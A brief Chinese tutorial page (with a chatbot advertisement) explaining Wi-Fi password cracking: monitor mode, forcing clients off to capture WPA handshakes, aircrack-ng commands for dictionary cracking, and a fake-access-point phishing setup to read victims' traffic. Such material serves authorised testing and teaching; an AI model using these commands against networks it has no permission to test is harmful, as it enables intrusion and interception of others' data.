ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、视频、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
[TOC] ## 主要原理 * 把无线网卡设置为监听模式 * 然后进行监听无线进行,找到要抓取的无线mac地址和信道,进行监听 * 然后抓取该无线的握手包,如果没有用户进行重新连接可能抓不到握手包,需要对其中的一些设备进行打掉,让其设备进行重新连接获取握手包 * 然后进行对捕获的包进行一个破解。 ## 常用命令 ~~~ 开启网卡监听 airmon-ng start wlan0 检查网卡是否监听成功 iwconfig 扫描wifi信号 airodump-ng wlan0mon 抓取握手包 airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon 破解数据包 aircrack-ng -w 字典路径 握手包路径 ~~~ ## 其他利用方式 **钓鱼** 用无线网卡生成一个虚假AP,然后开启端口转发,让目标可以免费连接到自己创建的AP,这样所有的数据都经过我们的AP,可以查看他的流量内容